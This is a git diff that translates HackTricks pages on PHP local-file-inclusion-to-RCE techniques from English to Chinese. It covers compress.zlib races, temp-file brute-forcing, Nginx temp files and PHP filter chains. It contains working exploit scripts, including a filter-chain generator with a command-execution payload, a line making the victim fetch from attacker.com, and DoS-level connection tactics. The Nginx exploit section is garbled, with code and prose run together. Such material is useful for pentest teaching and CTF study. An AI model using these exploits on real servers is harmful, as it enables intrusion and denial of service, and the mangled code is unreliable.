 <figure><img src="../../images/image (1031).png" alt=""><figcaption></figcaption></figure>
 
-## References
+## 参考
 
 - [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal)\\
 - [PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal/Intruders](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal/Intruders)
@@ -720,18 +642,17 @@ If you include any of the files `/usr/bin/phar`, `/usr/bin/phar7`, `/usr/bin/pha
 
 <figure><img src="../../images/image (3).png" alt=""><figcaption></figcaption></figure>
 
-Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
+加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器，与经验丰富的黑客和漏洞赏金猎人交流！
 
-**Hacking Insights**\
-Engage with content that delves into the thrill and challenges of hacking
+**黑客洞察**\
+参与深入探讨黑客的刺激与挑战的内容
 
-**Real-Time Hack News**\
-Keep up-to-date with fast-paced hacking world through real-time news and insights
+**实时黑客新闻**\
+通过实时新闻和见解，跟上快速变化的黑客世界
 
-**Latest Announcements**\
-Stay informed with the newest bug bounties launching and crucial platform updates
+**最新公告**\
+及时了解最新的漏洞赏金计划和重要平台更新
 
-**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today!
+**加入我们** [**Discord**](https://discord.com/invite/N3FrSbmwdy)，今天就开始与顶级黑客合作吧！
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/file-inclusion/lfi2rce-via-compress.zlib-+-php_stream_prefer_studio-+-path-disclosure.md b/src/pentesting-web/file-inclusion/lfi2rce-via-compress.zlib-+-php_stream_prefer_studio-+-path-disclosure.md
index 5d2d08e13..6da3faacf 100644
--- a/src/pentesting-web/file-inclusion/lfi2rce-via-compress.zlib-+-php_stream_prefer_studio-+-path-disclosure.md
+++ b/src/pentesting-web/file-inclusion/lfi2rce-via-compress.zlib-+-php_stream_prefer_studio-+-path-disclosure.md
@@ -1,44 +1,39 @@
-# LFI2RCE Via compress.zlib + PHP_STREAM_PREFER_STUDIO + Path Disclosure
+# LFI2RCE 通过 compress.zlib + PHP_STREAM_PREFER_STDIO + 路径泄露
 
 {{#include ../../banners/hacktricks-training.md}}
 
-### `compress.zlib://` and `PHP_STREAM_PREFER_STDIO`
+### `compress.zlib://` 和 `PHP_STREAM_PREFER_STDIO`
 
-A file opened using the protocol `compress.zlib://` with the flag `PHP_STREAM_PREFER_STDIO` can continue writing data that arrives to the connection later to the same file.
-
-This means that a call such as:
+使用协议 `compress.zlib://` 和标志 `PHP_STREAM_PREFER_STDIO` 打开的文件可以继续将稍后到达连接的数据写入同一文件。
 
+这意味着像这样的调用：
 ```php
 file_get_contents("compress.zlib://http://attacker.com/file")
 ```
+将发送请求，询问 http://attacker.com/file，然后服务器可能会用有效的 HTTP 响应来响应请求，保持连接打开，并在稍后发送额外的数据，这些数据也将写入文件。
 
-Will send a request asking for http://attacker.com/file, then the server might respond the request with a valid HTTP response, keep the connection open, and send extra data some time later that will be also written into the file.
-
-You can see that info in this part of the php-src code in main/streams/cast.c:
-
+您可以在 php-src 代码的 main/streams/cast.c 的这一部分看到该信息：
 ```c
 /* Use a tmpfile and copy the old streams contents into it */
 
-    if (flags & PHP_STREAM_PREFER_STDIO) {
-        *newstream = php_stream_fopen_tmpfile();
-    } else {
-        *newstream = php_stream_temp_new();
-    }
+if (flags & PHP_STREAM_PREFER_STDIO) {
+*newstream = php_stream_fopen_tmpfile();
+} else {
+*newstream = php_stream_temp_new();
+}
 ```
+### 竞争条件到 RCE
 
-### Race Condition to RCE
+[**这个 CTF**](https://balsn.tw/ctf_writeup/20191228-hxp36c3ctf/#includer) 是使用之前的技巧解决的。
 
-[**This CTF**](https://balsn.tw/ctf_writeup/20191228-hxp36c3ctf/#includer) was solved using the previous trick.
+攻击者将使 **受害者服务器打开一个连接，从攻击者的服务器读取文件**，使用 **`compress.zlib`** 协议。
 
-The attacker will make the **victim server open a connection reading a file from the attackers server** using the **`compress.zlib`** protocol.
+**在**这个 **连接** 存在的同时，攻击者将 **提取临时文件的路径**（它被服务器泄露）。
 
-**While** this **connection** exist the attacker will **exfiltrate the path** to the temp file created (it's leaked by the server).
+**在**这个 **连接** 仍然打开的情况下，攻击者将 **利用 LFI 加载他控制的临时文件**。
 
-**While** the **connection** is still open, the attacker will **exploit a LFI loading the temp file** that he controls.
+然而，web 服务器中有一个检查 **防止加载包含 `<?`** 的文件。因此，攻击者将利用 **竞争条件**。在仍然打开的连接中，**攻击者** 将 **在** **webserver** **检查** 文件是否包含禁止字符 **之后** 发送 PHP 负载，但 **在加载其内容之前**。
 
-However, there is a check in the web server that **prevents loading files that contains `<?`**. Therefore, the attacker will abuse a **Race Condition**. In the connection that is still open the **attacker** will **send the PHP payload AFTER** the **webserver** has **checked** if the file contains the forbidden characters but **BEFORE it loads its content**.
-
-For more information check the description of the Race Condition and the CTF in [https://balsn.tw/ctf_writeup/20191228-hxp36c3ctf/#includer](https://balsn.tw/ctf_writeup/20191228-hxp36c3ctf/#includer)
+有关更多信息，请查看竞争条件和 CTF 的描述 [https://balsn.tw/ctf_writeup/20191228-hxp36c3ctf/#includer](https://balsn.tw/ctf_writeup/20191228-hxp36c3ctf/#includer)
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/file-inclusion/lfi2rce-via-eternal-waiting.md b/src/pentesting-web/file-inclusion/lfi2rce-via-eternal-waiting.md
index 14e46702f..3be27223f 100644
--- a/src/pentesting-web/file-inclusion/lfi2rce-via-eternal-waiting.md
+++ b/src/pentesting-web/file-inclusion/lfi2rce-via-eternal-waiting.md
@@ -2,101 +2,96 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Basic Information
+## 基本信息
 
-By default when a file is uploaded to PHP (even if it isn't expecting it), it will generate a temporary file in `/tmp` with a name such as **`php[a-zA-Z0-9]{6}`**, although I have seen some docker images where the generated files don't contain digits.
+默认情况下，当文件上传到 PHP（即使它不期望这样做）时，它将在 `/tmp` 中生成一个临时文件，名称类似于 **`php[a-zA-Z0-9]{6}`**，尽管我见过一些 docker 镜像生成的文件不包含数字。
 
-In a local file inclusion, **if you manage to include that uploaded file, you will get RCE**.
-
-Note that by default **PHP only allows to upload 20 files in a single request** (set in `/etc/php/<version>/apache2/php.ini`):
+在本地文件包含中，**如果你设法包含那个上传的文件，你将获得 RCE**。
 
+请注意，默认情况下，**PHP 仅允许在单个请求中上传 20 个文件**（在 `/etc/php/<version>/apache2/php.ini` 中设置）：
 ```
 ; Maximum number of files that can be uploaded via a single request
 max_file_uploads = 20
 ```
+此外，**潜在文件名的数量为 62\*62\*62\*62\*62\*62 = 56800235584**
 
-Also, the **number of potential filenames are 62\*62\*62\*62\*62\*62 = 56800235584**
+### 其他技术
 
-### Other techniques
+其他技术依赖于攻击 PHP 协议（如果您只控制路径的最后部分，将无法进行攻击）、披露文件路径、滥用预期文件，或**使 PHP 遭受分段错误，以便上传的临时文件不会被删除**。\
+这种技术**与最后一种非常相似，但不需要找到零日漏洞**。
 
-Other techniques relies in attacking PHP protocols (you won't be able if you only control the last part of the path), disclosing the path of the file, abusing expected files, or **making PHP suffer a segmentation fault so uploaded temporary files aren't deleted**.\
-This technique is **very similar to the last one but without needed to find a zero day**.
+### 永久等待技术
 
-### Eternal wait technique
+在这种技术中，**我们只需要控制一个相对路径**。如果我们设法上传文件并使**LFI 永远不会结束**，我们将有“足够的时间”来**暴力破解上传的文件**并**找到**任何已上传的文件。
 
-In this technique **we only need to control a relative path**. If we manage to upload files and make the **LFI never end**, we will have "enough time" to **brute-force uploaded files** and **find** any of the ones uploaded.
+**这种技术的优点**：
 
-**Pros of this technique**:
+- 您只需控制包含中的相对路径
+- 不需要 nginx 或意外的日志文件访问级别
+- 不需要零日漏洞来导致分段错误
+- 不需要路径披露
 
-- You just need to control a relative path inside an include
-- Doesn't require nginx or unexpected level of access to log files
-- Doesn't require a 0 day to cause a segmentation fault
-- Doesn't require a path disclosure
+这种技术的**主要问题**是：
 
-The **main problems** of this technique are:
+- 需要特定的文件存在（可能还有更多）
+- **潜在文件名的数量惊人**：**56800235584**
+- 如果服务器**不使用数字**，则总潜在数量为：**19770609664**
+- 默认情况下**每个请求只能上传 20 个文件**。
+- 使用的服务器的**最大并行工作者数量**。
+- 这个限制与之前的限制可能会使攻击持续太久
+- **PHP 请求的超时**。理想情况下，这应该是永恒的，或者应该在不删除临时上传文件的情况下终止 PHP 进程，否则这也会很麻烦
 
-- Need a specific file(s) to be present (there might be more)
-- The **insane** amount of potential file names: **56800235584**
-  - If the server **isn't using digits** the total potential amount is: **19770609664**
-- By default **only 20 files** can be uploaded in a **single request**.
-- The **max number of parallel workers** of the used server.
-  - This limit with the previous ones can make this attack last too much
-- **Timeout for a PHP request**. Ideally this should be eternal or should kill the PHP process without deleting the temp uploaded files, if not, this will also be a pain
-
-So, how can you **make a PHP include never end**? Just by including the file **`/sys/kernel/security/apparmor/revision`** (**not available in Docker containers** unfortunately...).
-
-Try it just calling:
+那么，您如何**使 PHP 包含永远不会结束**？只需包含文件**`/sys/kernel/security/apparmor/revision`**（**在 Docker 容器中不可用**，不幸的是...）。
 
+只需调用：
 ```bash
 php -a # open php cli
 include("/sys/kernel/security/apparmor/revision");
 ```
-
 ## Apache2
 
-By default, Apache support **150 concurrent connections**, following [https://ubiq.co/tech-blog/increase-max-connections-apache/](https://ubiq.co/tech-blog/increase-max-connections-apache/) it's possible to upgrade this number up to 8000. Follow this to use PHP with that module: [https://www.digitalocean.com/community/tutorials/how-to-configure-apache-http-with-mpm-event-and-php-fpm-on-ubuntu-18-04](https://www.digitalocean.com/community/tutorials/how-to-configure-apache-http-with-mpm-event-and-php-fpm-on-ubuntu-18-04).
+默认情况下，Apache 支持 **150 个并发连接**，根据 [https://ubiq.co/tech-blog/increase-max-connections-apache/](https://ubiq.co/tech-blog/increase-max-connections-apache/) 的说法，可以将这个数字提升到 8000。按照此方法使用 PHP 和该模块： [https://www.digitalocean.com/community/tutorials/how-to-configure-apache-http-with-mpm-event-and-php-fpm-on-ubuntu-18-04](https://www.digitalocean.com/community/tutorials/how-to-configure-apache-http-with-mpm-event-and-php-fpm-on-ubuntu-18-04)。
 
-By default, (as I can see in my tests), a **PHP process can last eternally**.
+默认情况下，（根据我的测试）**PHP 进程可以永远存在**。
 
-Let's do some maths:
+让我们做一些数学计算：
 
-- We can use **149 connections** to generate **149 \* 20 = 2980 temp files** with our webshell.
-- Then, use the **last connection** to **brute-force** potential files.
-- At a speed of **10 requests/s** the times are:
-  - 56800235584 / 2980 / 10 / 3600 \~= **530 hours** (50% chance in 265h)
-  - (without digits) 19770609664 / 2980 / 10 / 3600 \~= 185h (50% chance in 93h)
+- 我们可以使用 **149 个连接** 生成 **149 \* 20 = 2980 个临时文件**，通过我们的 webshell。
+- 然后，使用 **最后一个连接** 来 **暴力破解** 潜在文件。
+- 以 **10 请求/秒** 的速度，时间为：
+- 56800235584 / 2980 / 10 / 3600 \~= **530 小时**（265 小时有 50% 的机会）
+- （不带数字）19770609664 / 2980 / 10 / 3600 \~= 185 小时（93 小时有 50% 的机会）
 
 > [!WARNING]
-> Note that in the previous example we are **completely DoSing other clients**!
+> 请注意，在前面的例子中，我们正在 **完全 DoS 其他客户端**！
 
-If the Apache server is improved and we could abuse **4000 connections** (half way to the max number). We could create `3999*20 = 79980` **files** and the **number** would be **reduced** to around **19.7h** or **6.9h** (10h, 3.5h 50% chance).
+如果 Apache 服务器得到改善，我们可以滥用 **4000 个连接**（达到最大数量的一半）。我们可以创建 `3999*20 = 79980` **个文件**，并且 **时间** 将 **减少** 到大约 **19.7 小时** 或 **6.9 小时**（10 小时，3.5 小时有 50% 的机会）。
 
 ## PHP-FMP
 
-If instead of using the regular php mod for apache to run PHP scripts the **web page is using** **PHP-FMP** (this improves the efficiency of the web page, so it's common to find it), there is something else that can be done to improve the technique.
+如果不使用常规的 php mod 来运行 PHP 脚本，而是 **网页使用** **PHP-FMP**（这提高了网页的效率，因此常常可以找到它），还有其他方法可以改善该技术。
 
-PHP-FMP allow to **configure** the **parameter** **`request_terminate_timeout`** in **`/etc/php/<php-version>/fpm/pool.d/www.conf`**.\
-This parameter indicates the maximum amount of seconds **when** **request to PHP must terminate** (infinite by default, but **30s if the param is uncommented**). When a request is being processed by PHP the indicated number of seconds, it's **killed**. This means, that if the request was uploading temporary files, because the **php processing was stopped**, those **files aren't going to be deleted**. Therefore, if you can make a request last that time, you can **generate thousands of temporary files** that won't be deleted, which will **speed up the process of finding them** and reduces the probability of a DoS to the platform by consuming all connections.
+PHP-FMP 允许 **配置** **参数** **`request_terminate_timeout`** 在 **`/etc/php/<php-version>/fpm/pool.d/www.conf`** 中。\
+该参数指示 **请求 PHP 时必须终止的最大秒数**（默认无限，但 **如果参数未注释则为 30 秒**）。当请求被 PHP 处理时，达到指定的秒数后，它会被 **终止**。这意味着，如果请求正在上传临时文件，因为 **PHP 处理被停止**，那些 **文件不会被删除**。因此，如果您可以使请求持续该时间，您可以 **生成成千上万的临时文件**，这些文件不会被删除，这将 **加快查找它们的过程**，并减少通过消耗所有连接对平台造成 DoS 的可能性。
 
-So, to **avoid DoS** lets suppose that an **attacker will be using only 100 connections** at the same time and php max processing time by **php-fmp** (`request_terminate_timeout`**)** is **30s**. Therefore, the number of **temp files** that can be generated **by second** is `100*20/30 = 66.67`.
+因此，为了 **避免 DoS**，假设 **攻击者将同时使用 100 个连接**，而 PHP 的最大处理时间通过 **php-fmp**（`request_terminate_timeout`**）** 是 **30 秒**。因此，**每秒** 可以生成的 **临时文件** 数量为 `100*20/30 = 66.67`。
 
-Then, to generate **10000 files** an attacker would need: **`10000/66.67 = 150s`** (to generate **100000 files** the time would be **25min**).
+然后，攻击者需要 **`10000/66.67 = 150s`** 来生成 **10000 个文件**（生成 **100000 个文件** 的时间为 **25 分钟**）。
 
-Then, the attacker could use those **100 connections** to perform a **search brute-force**. \*\*\*\* Supposing a speed of 300 req/s the time needed to exploit this is the following:
+然后，攻击者可以使用这 **100 个连接** 来执行 **暴力搜索**。 \*\*\*\* 假设速度为 300 req/s，利用此漏洞所需的时间如下：
 
-- 56800235584 / 10000 / 300 / 3600 \~= **5.25 hours** (50% chance in 2.63h)
-- (with 100000 files) 56800235584 / 100000 / 300 / 3600 \~= **0.525 hours** (50% chance in 0.263h)
+- 56800235584 / 10000 / 300 / 3600 \~= **5.25 小时**（2.63 小时有 50% 的机会）
+- （有 100000 个文件）56800235584 / 100000 / 300 / 3600 \~= **0.525 小时**（0.263 小时有 50% 的机会）
 
-Yes, it's possible to generate 100000 temporary files in an EC2 medium size instance:
+是的，可以在 EC2 中等大小的实例中生成 100000 个临时文件：
 
 <figure><img src="../../images/image (240).png" alt=""><figcaption></figcaption></figure>
 
 > [!WARNING]
-> Note that in order to trigger the timeout it would be **enough to include the vulnerable LFI page**, so it enters in an eternal include loop.
+> 请注意，为了触发超时，**仅需包含易受攻击的 LFI 页面**，使其进入一个永恒的包含循环。
 
 ## Nginx
 
-It looks like by default Nginx supports **512 parallel connections** at the same time (and this number can be improved).
+默认情况下，Nginx 似乎支持 **512 个并行连接**（这个数字可以提高）。 
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/file-inclusion/lfi2rce-via-nginx-temp-files.md b/src/pentesting-web/file-inclusion/lfi2rce-via-nginx-temp-files.md
index bca754883..23c4bc196 100644
--- a/src/pentesting-web/file-inclusion/lfi2rce-via-nginx-temp-files.md
+++ b/src/pentesting-web/file-inclusion/lfi2rce-via-nginx-temp-files.md
@@ -1,24 +1,21 @@
-# LFI2RCE via Nginx temp files
+# LFI2RCE 通过 Nginx 临时文件
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Vulnerable configuration
+## 易受攻击的配置
 
-[**Example from https://bierbaumer.net/security/php-lfi-with-nginx-assistance/**](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)
-
-- PHP code:
+[**来自 https://bierbaumer.net/security/php-lfi-with-nginx-assistance/**](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)
 
+- PHP 代码:
 ```php
 
 /dev/pts/0 lrwx------ 1 www-data www-data 64 Dec 25 23:56 1 -> /dev/pts/0 lrwx------ 1 www-data www-data 64 Dec 25 23:49 10 -> anon\_inode:\[eventfd] lrwx------ 1 www-data www-data 64 Dec 25 23:49 11 -> socket:\[27587] lrwx------ 1 www-data www-data 64 Dec 25 23:49 12 -> socket:\[27589] lrwx------ 1 www-data www-data 64 Dec 25 23:56 13 -> socket:\[44926] lrwx------ 1 www-data www-data 64 Dec 25 23:57 14 -> socket:\[44927] lrwx------ 1 www-data www-data 64 Dec 25 23:58 15 -> /var/lib/nginx/body/0000001368 (deleted) ... \`\`\` Note: One cannot directly include \`/proc/34/fd/15\` in this example as PHP's \`include\` function would resolve the path to \`/var/lib/nginx/body/0000001368 (deleted)\` which doesn't exist in in the filesystem. This minor restriction can luckily be bypassed by some indirection like: \`/proc/self/fd/34/../../../34/fd/15\` which will finally execute the content of the deleted \`/var/lib/nginx/body/0000001368\` file. ## Full Exploit \`\`\`python #!/usr/bin/env python3 import sys, threading, requests # exploit PHP local file inclusion (LFI) via nginx's client body buffering assistance # see https://bierbaumer.net/security/php-lfi-with-nginx-assistance/ for details URL = f'http://{sys.argv\[1]}:{sys.argv\[2]}/' # find nginx worker processes r = requests.get(URL, params={ 'file': '/proc/cpuinfo' }) cpus = r.text.count('processor') r = requests.get(URL, params={ 'file': '/proc/sys/kernel/pid\_max' }) pid\_max = int(r.text) print(f'\[\*] cpus: {cpus}; pid\_max: {pid\_max}') nginx\_workers = \[] for pid in range(pid\_max): r = requests.get(URL, params={ 'file': f'/proc/{pid}/cmdline' }) if b'nginx: worker process' in r.content: print(f'\[\*] nginx worker found: {pid}') nginx\_workers.append(pid) if len(nginx\_workers) >= cpus: break done = False # upload a big client body to force nginx to create a /var/lib/nginx/body/$X def uploader(): print('\[+] starting uploader') while not done: requests.get(URL, data=' //'
 
 ```
-
-    requests_session.post(SERVER + "/?action=read&file=/bla", data=(payload + ("a" * (body_size - len(payload)))))
+requests_session.post(SERVER + "/?action=read&file=/bla", data=(payload + ("a" * (body_size - len(payload)))))
 
 except:
 pass
-
 ```
 
 def send\_payload\_worker(requests\_session): while True: send\_payload(requests\_session)
@@ -36,19 +33,17 @@ def read\_file\_multiprocess(requests\_session, nginx\_pids): for nginx\_pid in
 if **name** == "**main**": print('\[DEBUG] Creating requests session') requests\_session = create\_requests\_session() print('\[DEBUG] Getting Nginx pids') nginx\_pids = get\_nginx\_pids(requests\_session) print(f'\[DEBUG] Nginx pids: {nginx\_pids}') print('\[DEBUG] Starting payload sending') send\_payload\_multiprocess(requests\_session) print('\[DEBUG] Starting fd readers') read\_file\_multiprocess(requests\_session, nginx\_pids)
 
 ```
-
-## Labs
+## 实验室
 
 - [https://bierbaumer.net/security/php-lfi-with-nginx-assistance/php-lfi-with-nginx-assistance.tar.xz](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/php-lfi-with-nginx-assistance.tar.xz)
 - [https://2021.ctf.link/internal/challenge/ed0208cd-f91a-4260-912f-97733e8990fd/](https://2021.ctf.link/internal/challenge/ed0208cd-f91a-4260-912f-97733e8990fd/)
 - [https://2021.ctf.link/internal/challenge/a67e2921-e09a-4bfa-8e7e-11c51ac5ee32/](https://2021.ctf.link/internal/challenge/a67e2921-e09a-4bfa-8e7e-11c51ac5ee32/)
 
-## References
+## 参考
 
 - [https://bierbaumer.net/security/php-lfi-with-nginx-assistance/](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)
 
 {{#include ../../banners/hacktricks-training.md}}
-
 ```
 
 ```
diff --git a/src/pentesting-web/file-inclusion/lfi2rce-via-php-filters.md b/src/pentesting-web/file-inclusion/lfi2rce-via-php-filters.md
index 53d0694bc..b2be0ef9b 100644
--- a/src/pentesting-web/file-inclusion/lfi2rce-via-php-filters.md
+++ b/src/pentesting-web/file-inclusion/lfi2rce-via-php-filters.md
@@ -4,43 +4,42 @@
 
 <figure><img src="/images/image (2).png" alt=""><figcaption></figcaption></figure>
 
-Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified:
+深化您在 **移动安全** 方面的专业知识，加入 8kSec Academy。通过我们的自学课程掌握 iOS 和 Android 安全，并获得认证：
 
 {% embed url="https://academy.8ksec.io/" %}
 
-## Intro
+## 介绍
 
-This [**writeup** ](https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278d4d)explains that you can use **php filters to generate arbitrary content** as output. Which basically means that you can **generate arbitrary php code** for the include **without needing to write** it into a file.
+这个 [**写作**](https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278d4d) 解释了您可以使用 **php 过滤器生成任意内容** 作为输出。这基本上意味着您可以 **生成任意 php 代码** 以供包含 **而无需将其写入** 文件。
 
-Basically the goal of the script is to **generate a Base64** string at the **beginning** of the file that will be **finally decoded** providing the desired payload that will be **interpreted by `include`**.
+基本上，脚本的目标是在文件的 **开头** 生成一个 Base64 字符串，该字符串将被 **最终解码**，提供所需的有效负载，该有效负载将被 **`include` 解释**。
 
-The bases to do this are:
+实现这一目标的基础是：
 
-- `convert.iconv.UTF8.CSISO2022KR` will always prepend `\x1b$)C` to the string
-- `convert.base64-decode` is extremely tolerant, it will basically just ignore any characters that aren't valid base64. It gives some problems if it finds unexpected "=" but those can be removed with the `convert.iconv.UTF8.UTF7` filter.
+- `convert.iconv.UTF8.CSISO2022KR` 将始终在字符串前添加 `\x1b$)C`
+- `convert.base64-decode` 对无效的 base64 字符极其宽容。它基本上会忽略任何无效的 base64 字符。如果它发现意外的 "="，会出现一些问题，但可以通过 `convert.iconv.UTF8.UTF7` 过滤器删除这些字符。
 
-The loop to generate arbitrary content is:
+生成任意内容的循环是：
 
-1. prepend `\x1b$)C` to our string as described above
-2. apply some chain of iconv conversions that leaves our initial base64 intact and converts the part we just prepended to some string where the only valid base64 char is the next part of our base64-encoded php code
-3. base64-decode and base64-encode the string which will remove any garbage in between
-4. Go back to 1 if the base64 we want to construct isn't finished yet
-5. base64-decode to get our php code
+1. 按照上述描述将 `\x1b$)C` 添加到我们的字符串前面
+2. 应用一些 iconv 转换链，使我们的初始 base64 保持不变，并将我们刚刚添加的部分转换为只有下一个部分的有效 base64 字符的字符串
+3. 对字符串进行 base64 解码和 base64 编码，这将删除中间的任何垃圾
+4. 如果我们想构造的 base64 还没有完成，则返回到第 1 步
+5. 进行 base64 解码以获取我们的 php 代码
 
 > [!WARNING]
-> **Includes** usually do things like **appending ".php" at the end** of the file, which could diffecult the exploitation of this because you would need to find a .php file with a content that does't kill the exploit... or you **could just use `php://temp` as resource** because it can **have anything appended in the name** (lie +".php") and it will still allow the exploit to work!
+> **包含** 通常会在文件末尾 **附加 ".php"**，这可能会使利用变得困难，因为您需要找到一个内容不会破坏利用的 .php 文件……或者您 **可以直接使用 `php://temp` 作为资源**，因为它可以 **在名称中附加任何内容**（例如 +".php"），并且仍然允许利用工作！
 
-## How to add also suffixes to the resulting data
+## 如何将后缀添加到结果数据
 
-[**This writeup explains**](https://www.ambionics.io/blog/wrapwrap-php-filters-suffix) how you can still abuse PHP filters to add suffixes to the resulting string. This is great in case you need the output to have some specific format (like json or maybe adding some PNG magic bytes)
+[**这篇写作解释了**](https://www.ambionics.io/blog/wrapwrap-php-filters-suffix) 您如何仍然可以滥用 PHP 过滤器为结果字符串添加后缀。如果您需要输出具有某种特定格式（如 json 或许添加一些 PNG 魔术字节），这非常好。
 
-## Automatic Tools
+## 自动工具
 
 - [https://github.com/synacktiv/php_filter_chain_generator](https://github.com/synacktiv/php_filter_chain_generator)
-- [**https://github.com/ambionics/wrapwrap**](https://github.com/ambionics/wrapwrap) **(can add suffixes)**
-
-## Full script
+- [**https://github.com/ambionics/wrapwrap**](https://github.com/ambionics/wrapwrap) **（可以添加后缀）**
 
+## 完整脚本
 ```python
 import requests
 
@@ -52,24 +51,24 @@ command = "/readflag"
 base64_payload = "PD89YCRfR0VUWzBdYDs7Pz4"
 
 conversions = {
-    'R': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2',
-    'B': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2',
-    'C': 'convert.iconv.UTF8.CSISO2022KR',
-    '8': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2',
-    '9': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.ISO6937.JOHAB',
-    'f': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.SHIFTJISX0213',
-    's': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L3.T.61',
-    'z': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS',
-    'U': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.CP1133.IBM932',
-    'P': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.857.SHIFTJISX0213',
-    'V': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.851.BIG5',
-    '0': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.1046.UCS2',
-    'Y': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2',
-    'W': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.851.UTF8|convert.iconv.L7.UCS2',
-    'd': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UJIS|convert.iconv.852.UCS2',
-    'D': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2',
-    '7': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.866.UCS2',
-    '4': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC_P271.UCS2'
+'R': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2',
+'B': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2',
+'C': 'convert.iconv.UTF8.CSISO2022KR',
+'8': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2',
+'9': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.ISO6937.JOHAB',
+'f': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.SHIFTJISX0213',
+'s': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L3.T.61',
+'z': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS',
+'U': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.CP1133.IBM932',
+'P': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.857.SHIFTJISX0213',
+'V': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.851.BIG5',
+'0': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.1046.UCS2',
+'Y': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2',
+'W': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.851.UTF8|convert.iconv.L7.UCS2',
+'d': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UJIS|convert.iconv.852.UCS2',
